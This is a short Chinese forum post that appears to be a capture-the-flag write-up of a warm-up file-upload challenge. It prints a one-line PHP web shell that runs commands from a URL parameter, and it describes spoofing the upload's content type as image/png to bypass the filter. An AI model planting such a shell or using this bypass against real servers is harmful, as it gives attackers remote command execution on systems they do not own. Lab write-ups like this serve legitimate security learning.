-
-
[分享]签到题 逐光启航 文件上传漏洞
-
发表于: 2024-8-15 13:57 160
-
0x00 队友根据注释的base64 解码得到上传文件的php
0x01 编写一句话木马 yuzhou.php
1 | <?php system($_GET[ 'cmd' ]); ?> |
0x02 上传的时候Charles抓捕拦截修改文件类型为:image/png 成功上传
0x03 队友通过上传的木马脚本遍历flag文件
0x04 最终找到flag
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
- [分享]签到题 逐光启航 文件上传漏洞 161
- [原创]通过xnuspy hook 内核ptrace 函数绕过反调试 11845
- [原创]优化大模型以服务于iOS逆向工程 4012
- DeviceCheck 防护方案探讨 4591
看原图
赞赏
雪币:
留言: